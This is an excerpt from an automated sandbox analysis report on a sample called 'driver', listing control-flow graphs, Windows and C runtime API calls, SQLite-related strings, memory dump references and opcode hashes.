                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: always$aolf$bolb$bolc$buod$duplicate column name: %s$generated$laer$rahc$too many columns on %s$txet
                                                                                                                                                                                                                                                • API String ID: 0-2711416707
                                                                                                                                                                                                                                                • Opcode ID: 05ced19ffbda2af8d84160c6d126e85ab313c37855989897a54843a788ef34fb
                                                                                                                                                                                                                                                • Instruction ID: 5c1934b6a7fe14f200f408e50c4d6d77d5bcec378c2070267af5a29920df5f51
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05ced19ffbda2af8d84160c6d126e85ab313c37855989897a54843a788ef34fb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 02226722A4E6D269FB698B25905C3B97BD1EB41BCCF44A136DA9E473C1CF3CD5418328

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 861 7ff8a86692c0-7ff8a866933f 862 7ff8a866949d-7ff8a86694b3 861->862 863 7ff8a8669345-7ff8a866934f 861->863 865 7ff8a86693af-7ff8a86693f5 call 7ff8a8656180 862->865 866 7ff8a86694b9-7ff8a86694bf 862->866 863->862 864 7ff8a8669355-7ff8a8669358 863->864 864->866 868 7ff8a866935e 864->868 873 7ff8a8669a8e-7ff8a8669a91 865->873 874 7ff8a86693fb-7ff8a866945f call 7ff8a878382c 865->874 866->865 869 7ff8a86694c5-7ff8a86694db call 7ff8a8656180 866->869 871 7ff8a8669365-7ff8a866936e 868->871 877 7ff8a8669aee 869->877 878 7ff8a86694e1-7ff8a86694fc 869->878 871->871 875 7ff8a8669370-7ff8a866937f call 7ff8a8656180 871->875 873->877 879 7ff8a8669a93-7ff8a8669a9a 873->879 891 7ff8a8669788-7ff8a8669798 874->891 892 7ff8a8669465-7ff8a8669481 00007FF8B9F73010 874->892 875->877 887 7ff8a8669385-7ff8a866939b 00007FF8B9F73010 875->887 882 7ff8a8669af3-7ff8a8669b0a 877->882 894 7ff8a86694fe-7ff8a866950f 878->894 895 7ff8a8669516-7ff8a866951d 878->895 883 7ff8a8669a9c-7ff8a8669aa6 879->883 884 7ff8a8669ae5 879->884 889 7ff8a8669aae-7ff8a8669adb 883->889 890 7ff8a8669aa8 883->890 884->877 893 7ff8a86693a0-7ff8a86693a7 887->893 889->877 921 7ff8a8669add-7ff8a8669ae3 889->921 890->889 898 7ff8a86696df-7ff8a8669704 891->898 896 7ff8a866963b 892->896 897 7ff8a8669487-7ff8a8669498 00007FF8B9F73010 892->897 893->893 899 7ff8a86693a9 893->899 894->895 902 7ff8a8669520-7ff8a8669527 895->902 903 7ff8a866963e-7ff8a8669687 00007FF8B9F73010 * 2 896->903 897->903 900 7ff8a866983f 898->900 901 7ff8a866970a-7ff8a866970f 898->901 899->865 906 7ff8a8669844-7ff8a8669852 900->906 901->900 905 7ff8a8669715-7ff8a8669741 call 7ff8a865ffe0 901->905 902->902 909 7ff8a8669529-7ff8a8669530 902->909 907 7ff8a86696dd 903->907 908 7ff8a8669689-7ff8a8669690 903->908 915 7ff8a8669744-7ff8a8669764 905->915 911 7ff8a8669855-7ff8a8669858 906->911 907->898 912 7ff8a866977a-7ff8a8669783 908->912 913 7ff8a8669696-7ff8a86696a0 908->913 910 7ff8a8669537-7ff8a866953e 909->910 910->910 920 7ff8a8669540-7ff8a8669557 910->920 916 7ff8a866985e-7ff8a8669879 call 7ff8a8668840 911->916 917 7ff8a866990b-7ff8a8669915 911->917 912->907 918 7ff8a86696a8-7ff8a86696d5 913->918 919 7ff8a86696a2 913->919 922 7ff8a866983a-7ff8a866983d 915->922 923 7ff8a866976a-7ff8a8669774 915->923 916->917 946 7ff8a866987f-7ff8a8669903 916->946 928 7ff8a8669917-7ff8a8669920 917->928 929 7ff8a8669923-7ff8a8669936 call 7ff8a8664700 917->929 918->907 965 7ff8a86696d7 918->965 919->918 924 7ff8a8669559 920->924 925 7ff8a86695a7-7ff8a86695ae 920->925 921->877 922->911 934 7ff8a866979d-7ff8a86697a0 923->934 935 7ff8a8669776-7ff8a8669778 923->935 938 7ff8a8669560-7ff8a8669567 924->938 930 7ff8a86695d2-7ff8a86695d9 925->930 931 7ff8a86695b0-7ff8a86695b7 925->931 928->929 950 7ff8a866993c-7ff8a8669946 929->950 951 7ff8a8669a80-7ff8a8669a8c 929->951 941 7ff8a866962a 930->941 942 7ff8a86695db-7ff8a86695e5 930->942 931->865 939 7ff8a86695bd-7ff8a86695cc call 7ff8a8715b50 931->939 944 7ff8a86697a2-7ff8a86697aa 934->944 935->944 945 7ff8a8669570-7ff8a8669579 938->945 939->865 939->930 959 7ff8a8669633-7ff8a8669636 941->959 952 7ff8a86695ed-7ff8a866961a 942->952 953 7ff8a86695e7 942->953 947 7ff8a86697ce-7ff8a86697e4 call 7ff8a8716b40 944->947 948 7ff8a86697ac-7ff8a86697c0 call 7ff8a8667c10 944->948 945->945 955 7ff8a866957b-7ff8a8669589 945->955 970 7ff8a8669969-7ff8a866996f 946->970 971 7ff8a8669905 946->971 974 7ff8a86697fd 947->974 975 7ff8a86697e6-7ff8a86697fb call 7ff8a86ce010 947->975 948->947 973 7ff8a86697c2-7ff8a86697c7 948->973 961 7ff8a866994e-7ff8a8669961 950->961 962 7ff8a8669948 950->962 951->882 952->959 984 7ff8a866961c-7ff8a8669625 952->984 953->952 963 7ff8a8669590-7ff8a8669599 955->963 959->882 961->970 962->961 963->963 972 7ff8a866959b-7ff8a86695a5 963->972 965->907 977 7ff8a8669998-7ff8a86699a8 970->977 978 7ff8a8669971-7ff8a8669994 970->978 971->917 972->925 972->938 973->947 980 7ff8a86697ff-7ff8a8669804 974->980 975->980 987 7ff8a86699aa 977->987 988 7ff8a86699b0-7ff8a86699e1 977->988 978->977 985 7ff8a8669806-7ff8a866981c call 7ff8a8716b40 980->985 986 7ff8a8669832-7ff8a8669838 980->986 984->882 985->922 995 7ff8a866981e-7ff8a8669830 call 7ff8a86ce010 985->995 986->906 987->988 990 7ff8a86699f4-7ff8a86699fb 988->990 991 7ff8a86699e3-7ff8a86699f2 988->991 994 7ff8a86699ff-7ff8a8669a21 call 7ff8a8667c10 990->994 991->994 1000 7ff8a8669a29-7ff8a8669a2c 994->1000 1001 7ff8a8669a23-7ff8a8669a27 994->1001 995->922 995->986 1002 7ff8a8669a2e-7ff8a8669a31 1000->1002 1003 7ff8a8669a33 1000->1003 1004 7ff8a8669a37-7ff8a8669a49 1001->1004 1002->1003 1002->1004 1003->1004 1005 7ff8a8669a4b-7ff8a8669a52 1004->1005 1006 7ff8a8669a54-7ff8a8669a66 1004->1006 1007 7ff8a8669a6a-7ff8a8669a7e 1005->1007 1006->1007 1007->882
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007F73010
                                                                                                                                                                                                                                                • String ID: -journal$immutable$nolock
                                                                                                                                                                                                                                                • API String ID: 22509725-4201244970
                                                                                                                                                                                                                                                • Opcode ID: d2ddce0ad0a317c0152327d0b3e11dab5987b1b9eb9b0a833ce77e87ac107de1
                                                                                                                                                                                                                                                • Instruction ID: b586969076e93d94aef35278a4f74a45f0476bc678156fb714b02be4395e885b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d2ddce0ad0a317c0152327d0b3e11dab5987b1b9eb9b0a833ce77e87ac107de1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF32AF22A0A782AAFB698F25944837937A1FF44BE4F085235CE5E47794DF3CE455C328
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007F73010
                                                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API call with %s database connection pointer$NULL$invalid$misuse$unopened
                                                                                                                                                                                                                                                • API String ID: 22509725-509082904
                                                                                                                                                                                                                                                • Opcode ID: e3ced5d6ea85a757b1e139773ef655a56cd29a8a81a97bbefb3f42df5bc13da9
                                                                                                                                                                                                                                                • Instruction ID: b27c274e451537ff74eabed874c56ee897504c8c7a6e684194ef88c87479ac22
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e3ced5d6ea85a757b1e139773ef655a56cd29a8a81a97bbefb3f42df5bc13da9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E212CFA1A0FA42A5FB549F2598583796BA1FF80BC8F046031DF4E07794DF3CE4618328

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 1186 7ff6a29d5c70-7ff6a29d5cab call 7ff6a29d55f8 call 7ff6a29d5600 call 7ff6a29d5668 1193 7ff6a29d5ed5-7ff6a29d5f21 call 7ff6a29ca970 call 7ff6a29d55f8 call 7ff6a29d5600 call 7ff6a29d5668 1186->1193 1194 7ff6a29d5cb1-7ff6a29d5cbc call 7ff6a29d5608 1186->1194 1219 7ff6a29d605f-7ff6a29d60cd call 7ff6a29ca970 call 7ff6a29d15e8 1193->1219 1220 7ff6a29d5f27-7ff6a29d5f32 call 7ff6a29d5608 1193->1220 1194->1193 1199 7ff6a29d5cc2-7ff6a29d5ccc 1194->1199 1201 7ff6a29d5cee-7ff6a29d5cf2 1199->1201 1202 7ff6a29d5cce-7ff6a29d5cd1 1199->1202 1206 7ff6a29d5cf5-7ff6a29d5cfd 1201->1206 1205 7ff6a29d5cd4-7ff6a29d5cdf 1202->1205 1208 7ff6a29d5ce1-7ff6a29d5ce8 1205->1208 1209 7ff6a29d5cea-7ff6a29d5cec 1205->1209 1206->1206 1210 7ff6a29d5cff-7ff6a29d5d12 call 7ff6a29cd66c 1206->1210 1208->1205 1208->1209 1209->1201 1212 7ff6a29d5d1b-7ff6a29d5d29 1209->1212 1217 7ff6a29d5d14-7ff6a29d5d16 call 7ff6a29ca9b8 1210->1217 1218 7ff6a29d5d2a-7ff6a29d5d36 call 7ff6a29ca9b8 1210->1218 1217->1212 1227 7ff6a29d5d3d-7ff6a29d5d45 1218->1227 1240 7ff6a29d60cf-7ff6a29d60d6 1219->1240 1241 7ff6a29d60db-7ff6a29d60de 1219->1241 1220->1219 1229 7ff6a29d5f38-7ff6a29d5f43 call 7ff6a29d5638 1220->1229 1227->1227 1230 7ff6a29d5d47-7ff6a29d5d58 call 7ff6a29d04e4 1227->1230 1229->1219 1238 7ff6a29d5f49-7ff6a29d5f6c call 7ff6a29ca9b8 GetTimeZoneInformation 1229->1238 1230->1193 1239 7ff6a29d5d5e-7ff6a29d5db4 call 7ff6a29da540 * 4 call 7ff6a29d5b8c 1230->1239 1257 7ff6a29d5f72-7ff6a29d5f93 1238->1257 1258 7ff6a29d6034-7ff6a29d605e call 7ff6a29d55f0 call 7ff6a29d55e0 call 7ff6a29d55e8 1238->1258 1299 7ff6a29d5db6-7ff6a29d5dba 1239->1299 1242 7ff6a29d616b-7ff6a29d616e 1240->1242 1243 7ff6a29d6115-7ff6a29d6128 call 7ff6a29cd66c 1241->1243 1244 7ff6a29d60e0 1241->1244 1247 7ff6a29d60e3 1242->1247 1248 7ff6a29d6174-7ff6a29d617c call 7ff6a29d5c70 1242->1248 1261 7ff6a29d6133-7ff6a29d614e call 7ff6a29d15e8 1243->1261 1262 7ff6a29d612a 1243->1262 1244->1247 1253 7ff6a29d60e8-7ff6a29d6114 call 7ff6a29ca9b8 call 7ff6a29bc5c0 1247->1253 1254 7ff6a29d60e3 call 7ff6a29d5eec 1247->1254 1248->1253 1254->1253 1265 7ff6a29d5f95-7ff6a29d5f9b 1257->1265 1266 7ff6a29d5f9e-7ff6a29d5fa5 1257->1266 1285 7ff6a29d6155-7ff6a29d6167 call 7ff6a29ca9b8 1261->1285 1286 7ff6a29d6150-7ff6a29d6153 1261->1286 1267 7ff6a29d612c-7ff6a29d6131 call 7ff6a29ca9b8 1262->1267 1265->1266 1268 7ff6a29d5fa7-7ff6a29d5faf 1266->1268 1269 7ff6a29d5fb9 1266->1269 1267->1244 1268->1269 1277 7ff6a29d5fb1-7ff6a29d5fb7 1268->1277 1279 7ff6a29d5fbb-7ff6a29d602f call 7ff6a29da540 * 4 call 7ff6a29d2bcc call 7ff6a29d6184 * 2 1269->1279 1277->1279 1279->1258 1285->1242 1286->1267 1300 7ff6a29d5dc0-7ff6a29d5dc4 1299->1300 1301 7ff6a29d5dbc 1299->1301 1300->1299 1303 7ff6a29d5dc6-7ff6a29d5deb call 7ff6a29c6bc8 1300->1303 1301->1300 1309 7ff6a29d5dee-7ff6a29d5df2 1303->1309 1311 7ff6a29d5df4-7ff6a29d5dff 1309->1311 1312 7ff6a29d5e01-7ff6a29d5e05 1309->1312 1311->1312 1314 7ff6a29d5e07-7ff6a29d5e0b 1311->1314 1312->1309 1317 7ff6a29d5e8c-7ff6a29d5e90 1314->1317 1318 7ff6a29d5e0d-7ff6a29d5e35 call 7ff6a29c6bc8 1314->1318 1319 7ff6a29d5e92-7ff6a29d5e94 1317->1319 1320 7ff6a29d5e97-7ff6a29d5ea4 1317->1320 1326 7ff6a29d5e53-7ff6a29d5e57 1318->1326 1327 7ff6a29d5e37 1318->1327 1319->1320 1322 7ff6a29d5ebf-7ff6a29d5ece call 7ff6a29d55f0 call 7ff6a29d55e0 1320->1322 1323 7ff6a29d5ea6-7ff6a29d5ebc call 7ff6a29d5b8c 1320->1323 1322->1193 1323->1322 1326->1317 1332 7ff6a29d5e59-7ff6a29d5e77 call 7ff6a29c6bc8 1326->1332 1331 7ff6a29d5e3a-7ff6a29d5e41 1327->1331 1331->1326 1333 7ff6a29d5e43-7ff6a29d5e51 1331->1333 1338 7ff6a29d5e83-7ff6a29d5e8a 1332->1338 1333->1326 1333->1331 1338->1317 1339 7ff6a29d5e79-7ff6a29d5e7d 1338->1339 1339->1317 1340 7ff6a29d5e7f 1339->1340 1340->1338
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6A29D5CB5
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29D5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D561C
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29CA9B8: HeapFree.KERNEL32(?,?,?,00007FF6A29D2D92,?,?,?,00007FF6A29D2DCF,?,?,00000000,00007FF6A29D3295,?,?,?,00007FF6A29D31C7), ref: 00007FF6A29CA9CE
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29CA9B8: GetLastError.KERNEL32(?,?,?,00007FF6A29D2D92,?,?,?,00007FF6A29D2DCF,?,?,00000000,00007FF6A29D3295,?,?,?,00007FF6A29D31C7), ref: 00007FF6A29CA9D8
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29CA970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6A29CA94F,?,?,?,?,?,00007FF6A29CA83A), ref: 00007FF6A29CA979
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29CA970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6A29CA94F,?,?,?,?,?,00007FF6A29CA83A), ref: 00007FF6A29CA99E
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6A29D5CA4
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29D5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D567C
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6A29D5F1A
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6A29D5F2B
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6A29D5F3C
                                                                                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6A29D617C), ref: 00007FF6A29D5F63
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                                • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                                • API String ID: 4070488512-239921721
                                                                                                                                                                                                                                                • Opcode ID: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
                                                                                                                                                                                                                                                • Instruction ID: c1092af912ab9c195aa3b9abc9fd48a7821443738fc25ae78f96f1c787582ad8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5BD1C126A4A24246FB24AF37D4811B96791EF84F9CF808136EA4DC7697DFBCE441B740

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 1461 7ff6a29d69d4-7ff6a29d6a47 call 7ff6a29d6708 1464 7ff6a29d6a61-7ff6a29d6a6b call 7ff6a29c8590 1461->1464 1465 7ff6a29d6a49-7ff6a29d6a52 call 7ff6a29c4f58 1461->1465 1470 7ff6a29d6a6d-7ff6a29d6a84 call 7ff6a29c4f58 call 7ff6a29c4f78 1464->1470 1471 7ff6a29d6a86-7ff6a29d6aef CreateFileW 1464->1471 1472 7ff6a29d6a55-7ff6a29d6a5c call 7ff6a29c4f78 1465->1472 1470->1472 1474 7ff6a29d6af1-7ff6a29d6af7 1471->1474 1475 7ff6a29d6b6c-7ff6a29d6b77 GetFileType 1471->1475 1483 7ff6a29d6da2-7ff6a29d6dc2 1472->1483 1481 7ff6a29d6b39-7ff6a29d6b67 GetLastError call 7ff6a29c4eec 1474->1481 1482 7ff6a29d6af9-7ff6a29d6afd 1474->1482 1478 7ff6a29d6bca-7ff6a29d6bd1 1475->1478 1479 7ff6a29d6b79-7ff6a29d6bb4 GetLastError call 7ff6a29c4eec CloseHandle 1475->1479 1486 7ff6a29d6bd3-7ff6a29d6bd7 1478->1486 1487 7ff6a29d6bd9-7ff6a29d6bdc 1478->1487 1479->1472 1495 7ff6a29d6bba-7ff6a29d6bc5 call 7ff6a29c4f78 1479->1495 1481->1472 1482->1481 1488 7ff6a29d6aff-7ff6a29d6b37 CreateFileW 1482->1488 1492 7ff6a29d6be2-7ff6a29d6c37 call 7ff6a29c84a8 1486->1492 1487->1492 1493 7ff6a29d6bde 1487->1493 1488->1475 1488->1481 1500 7ff6a29d6c56-7ff6a29d6c87 call 7ff6a29d6488 1492->1500 1501 7ff6a29d6c39-7ff6a29d6c45 call 7ff6a29d6910 1492->1501 1493->1492 1495->1472 1507 7ff6a29d6c8d-7ff6a29d6ccf 1500->1507 1508 7ff6a29d6c89-7ff6a29d6c8b 1500->1508 1501->1500 1506 7ff6a29d6c47 1501->1506 1509 7ff6a29d6c49-7ff6a29d6c51 call 7ff6a29cab30 1506->1509 1510 7ff6a29d6cf1-7ff6a29d6cfc 1507->1510 1511 7ff6a29d6cd1-7ff6a29d6cd5 1507->1511 1508->1509 1509->1483 1514 7ff6a29d6d02-7ff6a29d6d06 1510->1514 1515 7ff6a29d6da0 1510->1515 1511->1510 1513 7ff6a29d6cd7-7ff6a29d6cec 1511->1513 1513->1510 1514->1515 1517 7ff6a29d6d0c-7ff6a29d6d51 CloseHandle CreateFileW 1514->1517 1515->1483 1518 7ff6a29d6d53-7ff6a29d6d81 GetLastError call 7ff6a29c4eec call 7ff6a29c86d0 1517->1518 1519 7ff6a29d6d86-7ff6a29d6d9b 1517->1519 1518->1519 1519->1515
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1617910340-0
                                                                                                                                                                                                                                                • Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                                • Instruction ID: fb2cdb28f41e68f012ac534de495ffc7873891c7934d432ecb014d89e333865d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9AC1D032B69A4185EB10CFA6D4902AC37A1FB49F9CB015239DE2E977D6CF78E451E300

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 2054 7ff6a29d5eec-7ff6a29d5f21 call 7ff6a29d55f8 call 7ff6a29d5600 call 7ff6a29d5668 2061 7ff6a29d605f-7ff6a29d60cd call 7ff6a29ca970 call 7ff6a29d15e8 2054->2061 2062 7ff6a29d5f27-7ff6a29d5f32 call 7ff6a29d5608 2054->2062 2074 7ff6a29d60cf-7ff6a29d60d6 2061->2074 2075 7ff6a29d60db-7ff6a29d60de 2061->2075 2062->2061 2067 7ff6a29d5f38-7ff6a29d5f43 call 7ff6a29d5638 2062->2067 2067->2061 2073 7ff6a29d5f49-7ff6a29d5f6c call 7ff6a29ca9b8 GetTimeZoneInformation 2067->2073 2088 7ff6a29d5f72-7ff6a29d5f93 2073->2088 2089 7ff6a29d6034-7ff6a29d605e call 7ff6a29d55f0 call 7ff6a29d55e0 call 7ff6a29d55e8 2073->2089 2076 7ff6a29d616b-7ff6a29d616e 2074->2076 2077 7ff6a29d6115-7ff6a29d6128 call 7ff6a29cd66c 2075->2077 2078 7ff6a29d60e0 2075->2078 2080 7ff6a29d60e3 2076->2080 2081 7ff6a29d6174-7ff6a29d617c call 7ff6a29d5c70 2076->2081 2091 7ff6a29d6133-7ff6a29d614e call 7ff6a29d15e8 2077->2091 2092 7ff6a29d612a 2077->2092 2078->2080 2084 7ff6a29d60e8-7ff6a29d6114 call 7ff6a29ca9b8 call 7ff6a29bc5c0 2080->2084 2085 7ff6a29d60e3 call 7ff6a29d5eec 2080->2085 2081->2084 2085->2084 2095 7ff6a29d5f95-7ff6a29d5f9b 2088->2095 2096 7ff6a29d5f9e-7ff6a29d5fa5 2088->2096 2112 7ff6a29d6155-7ff6a29d6167 call 7ff6a29ca9b8 2091->2112 2113 7ff6a29d6150-7ff6a29d6153 2091->2113 2097 7ff6a29d612c-7ff6a29d6131 call 7ff6a29ca9b8 2092->2097 2095->2096 2098 7ff6a29d5fa7-7ff6a29d5faf 2096->2098 2099 7ff6a29d5fb9 2096->2099 2097->2078 2098->2099 2105 7ff6a29d5fb1-7ff6a29d5fb7 2098->2105 2107 7ff6a29d5fbb-7ff6a29d602f call 7ff6a29da540 * 4 call 7ff6a29d2bcc call 7ff6a29d6184 * 2 2099->2107 2105->2107 2107->2089 2112->2076 2113->2097
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6A29D5F1A
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29D5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D567C
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6A29D5F2B
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29D5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D561C
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6A29D5F3C
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29D5638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D564C
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29CA9B8: HeapFree.KERNEL32(?,?,?,00007FF6A29D2D92,?,?,?,00007FF6A29D2DCF,?,?,00000000,00007FF6A29D3295,?,?,?,00007FF6A29D31C7), ref: 00007FF6A29CA9CE
